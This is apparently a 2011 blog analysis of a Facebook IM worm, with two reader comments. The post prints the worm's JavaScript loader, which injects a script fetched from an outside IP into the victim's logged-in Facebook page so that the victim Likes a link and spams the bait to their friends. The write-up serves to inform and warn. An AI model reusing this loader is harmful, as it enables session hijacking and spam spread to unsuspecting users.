There’s a new variant of the Facebook April Fool’s worm going around. This one arrives as an IM with the text “haha! hilarous http://fb.me/TzCxMrJW”; the page behind the URL shortener is http://apps.facebook.com/bullydown/ (taken down since I started writing this, see screenshot). It is dressed up as a Facebook video, but clicking it runs the following JavaScript from an onclick handler:
javascript:if (window.opener) {
  // Opened as a popup from a Facebook page: append the loader script to the
  // opener's document (not the app page), then close the popup.
  window.opener.document.body.appendChild(document.createElement('script')).src = 'http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous';
  window.close();
} else {
  // No opener: append the same loader script to the current page instead.
  document.body.appendChild(document.createElement('script')).src = 'http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous';
}
Whatever fb.js does, the visible effect is that the victim Likes the link http://winterweddingfavor.info/bullypal/ (the like_link parameter) and then IMs the same bait text (the im_text parameter) to their friends; I got three of these messages in a short span of time. Note that the window.opener branch appends the script to the Facebook page that opened the popup rather than to the app page, so if that injection succeeds the loader runs inside the victim’s already logged-in session. I’m not sure what’s required to send IMs through Facebook; it might be that it uses a fake login page to steal credentials like other variants.
April 6, 2011 at 10:55 pm
One of my contacts who was compromised by this says that it didn’t ask for his Facebook credentials, so the mechanism by which it sends IMs must not need them.
October 5, 2011 at 2:23 pm
How can we remove this? It’s in my “Other pages you like” and it can’t be removed.